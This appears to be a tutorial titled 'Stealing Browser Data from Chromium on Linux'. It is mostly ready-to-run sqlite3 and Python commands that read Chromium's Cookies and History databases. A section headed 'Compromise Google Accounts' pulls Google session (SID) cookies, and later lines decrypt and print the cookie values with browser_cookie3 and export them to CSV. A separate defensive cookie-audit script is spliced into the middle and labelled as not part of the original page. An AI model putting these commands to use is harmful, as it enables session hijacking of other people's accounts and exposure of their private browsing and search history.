
Stealing Browser Data from Chromium on Linux

Chromium stores cookies in SQLite database files, not plain text. To view them from the terminal, use the sqlite3 command.

Locate the databases
find ~/.config/chromium \( -name "Cookies" -o -name "History" \)
Cookies

Key columns

  • host_key: Domain.

  • name: Cookie name (e.g., SID for session ID).

  • encrypted_value: Encrypted cookie value.

  • path: URL path where the cookie applies.

  • expires_utc: Expiration timestamp (microseconds since Windows epoch: Jan 1, 1601).

  • is_secure: 1 if HTTPS-only.

  • is_httponly: 1 if inaccessible to JavaScript.

Values are AES-GCM encrypted via OSCrypt

Top 10 websites with the highest number of cookies
sqlite3 ~/.config/chromium/Default/Cookies "SELECT host_key, COUNT(*) as count FROM cookies GROUP BY host_key ORDER BY count DESC LIMIT 10;"
Find cookies that are set to stay on the computer for years
sqlite3 ~/.config/chromium/Default/Cookies "SELECT host_key, name, datetime((expires_utc/1000000 - 11644473600), 'unixepoch', 'localtime') as expiration_date FROM cookies WHERE expires_utc > 0 ORDER BY expires_utc DESC LIMIT 20;"
Cookies with signed-in state
sqlite3 ~/.config/chromium/Default/Cookies "SELECT host_key, name, path, is_secure, is_httponly FROM cookies WHERE name LIKE '%SID%' OR name LIKE '%auth%' OR name LIKE '%session%';"
Find cookies that are marked as "Secure: NO". These cookies can be intercepted over Wi-Fi if you are on an open network:
sqlite3 ~/.config/chromium/Default/Cookies "SELECT host_key, name, is_secure, is_httponly
FROM cookies
WHERE is_secure = 0
ORDER BY host_key
LIMIT 20;"
Find the cookies that have been accessed most recently:
sqlite3 ~/.config/chromium/Default/Cookies "SELECT host_key, name, datetime(last_access_utc/1000000 - 11644473600, 'unixepoch', 'localtime') as last_seen
FROM cookies
ORDER BY last_access_utc DESC
LIMIT 20;"
List the cookies with the latest expiration dates to identify persistent tracking cookies:
sqlite3 ~/.config/chromium/Default/Cookies "SELECT host_key, name, datetime((expires_utc / 1000000 - 11644473600), 'unixepoch', 'localtime') as expiry_date FROM cookies WHERE expires_utc > 0 ORDER BY expires_utc DESC LIMIT 10;"
Filter by Domain (e.g., Google):
sqlite3 ~/.config/chromium/Default/Cookies "SELECT host_key, name, path, expires_utc, is_secure, is_httponly FROM cookies WHERE host_key LIKE '%google.com%' LIMIT 20;"
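
The checks from the cookie queries above combined into one audit, as an added example that is not part of the original page: it converts expires_utc from the 1601 epoch and flags session-like cookies that lack Secure or HttpOnly, or that live longer than a year. The in-memory table, its rows and the function names are constructed for illustration.

```python
import sqlite3
from datetime import datetime, timedelta, timezone

WEBKIT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
SESSION_HINTS = ("sid", "auth", "session")  # name patterns from the signed-in query

def webkit_to_datetime(us):
    """expires_utc is microseconds since 1601-01-01 UTC; 0 means session-only."""
    return WEBKIT_EPOCH + timedelta(microseconds=us) if us else None

def datetime_to_webkit(dt):
    return (dt - WEBKIT_EPOCH) // timedelta(microseconds=1)

def audit_cookies(conn, now, max_days=365):
    """Return (host, name, issues) for session-like cookies with weak attributes."""
    findings = []
    rows = conn.execute("SELECT host_key, name, expires_utc, is_secure, is_httponly "
                        "FROM cookies ORDER BY host_key, name")
    for host, name, expires_utc, is_secure, is_httponly in rows:
        if not any(h in name.lower() for h in SESSION_HINTS):
            continue
        issues = []
        if not is_secure:
            issues.append("no Secure flag")
        if not is_httponly:
            issues.append("no HttpOnly flag")
        expires = webkit_to_datetime(expires_utc)
        if expires and expires - now > timedelta(days=max_days):
            issues.append("expires " + expires.strftime("%Y-%m-%d"))
        if issues:
            findings.append((host, name, issues))
    return findings

def build_sample_db(now):
    """Constructed rows in an in-memory table holding only the columns audited here."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cookies (host_key TEXT, name TEXT, expires_utc INTEGER, "
                 "is_secure INTEGER, is_httponly INTEGER)")
    in_days = lambda d: datetime_to_webkit(now + timedelta(days=d))
    conn.executemany("INSERT INTO cookies VALUES (?, ?, ?, ?, ?)", [
        ("shop.example", "PHPSESSID", 0, 0, 0),               # session-only, no flags
        ("app.example", "session_token", in_days(30), 1, 1),  # well configured
        ("ads.example", "auth_id", in_days(3650), 1, 0),      # ten-year lifetime
        ("news.example", "theme", in_days(3650), 0, 0),       # not session-like
    ])
    return conn

if __name__ == "__main__":
    now = datetime.now(timezone.utc)
    for host, name, issues in audit_cookies(build_sample_db(now), now):
        print(f"{host:15} {name:15} {', '.join(issues)}")
```

To audit your own profile, pass audit_cookies a connection opened on a copy of the Cookies file, since the browser keeps the original locked while it is running.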
Search History
Top Sites
sqlite3 ~/.config/chromium/Default/History "SELECT url, title, visit_count, datetime(last_visit_time/1000000 - 11644473600, 'unixepoch', 'localtime') as last_seen FROM urls ORDER BY visit_count DESC LIMIT 20;"
Omnibox searches
sqlite3 ~/.config/chromium/Default/History "SELECT k.term, datetime(u.last_visit_time/1000000 - 11644473600, 'unixepoch', 'localtime') as time_searched FROM keyword_search_terms k JOIN urls u ON k.url_id = u.id ORDER BY u.last_visit_time DESC LIMIT 20;"
Last 20 Google Searches
sqlite3 ~/.config/chromium/Default/History "SELECT datetime(visits.visit_time / 1000000 - 11644473600, 'unixepoch', 'localtime') AS time, urls.url FROM visits JOIN urls ON visits.url = urls.id WHERE urls.url LIKE '%google.com/search?q=%' ORDER BY visits.visit_time DESC LIMIT 20;"
Recent Activity Log
sqlite3 ~/.config/chromium/Default/History "SELECT datetime(visits.visit_time / 1000000 - 11644473600, 'unixepoch', 'localtime') as time, substr(urls.url, 1, 60) as url, urls.title FROM visits JOIN urls ON visits.url = urls.id ORDER BY visits.visit_time DESC LIMIT 50;"
Compromise Google Accounts
Query all Google subdomains:
sqlite3 ~/.config/chromium/Default/Cookies "SELECT host_key, COUNT(*) FROM cookies WHERE host_key LIKE '%google.com%' GROUP BY host_key;"
Check Security Flags:
sqlite3 ~/.config/chromium/Default/Cookies "SELECT name, is_secure, is_httponly FROM cookies WHERE host_key LIKE '%google.com%' AND name LIKE '%SID%';"
Correlate with Expirations:
sqlite3 ~/.config/chromium/Default/Cookies "SELECT host_key, name, (expires_utc / 1000000 - 11644473600) as unix_expiry FROM cookies WHERE host_key LIKE '%google.com%' AND expires_utc > 0;" | awk -F'|' '{print $1 " " $2 " expires: " strftime("%Y-%m-%d %H:%M:%S", $3)}'

Decrypt Values

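On Linux, the key that encrypts these values is kept in your desktop keyring. An attacker with access to your session could use Python libraries like browser_cookie3:
import browser_cookie3
# chromium() reads the ~/.config/chromium profile queried on this page
cookies = browser_cookie3.chromium(domain_name='.google.com')
for c in cookies:
    print(c.name, c.value)  # e.g., SID: AQAAA...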
Export for Analysis:
sqlite3 -header -csv ~/.config/chromium/Default/Cookies "SELECT * FROM cookies WHERE host_key LIKE '%google.com%';" > ~/audits/google_cookies.csv
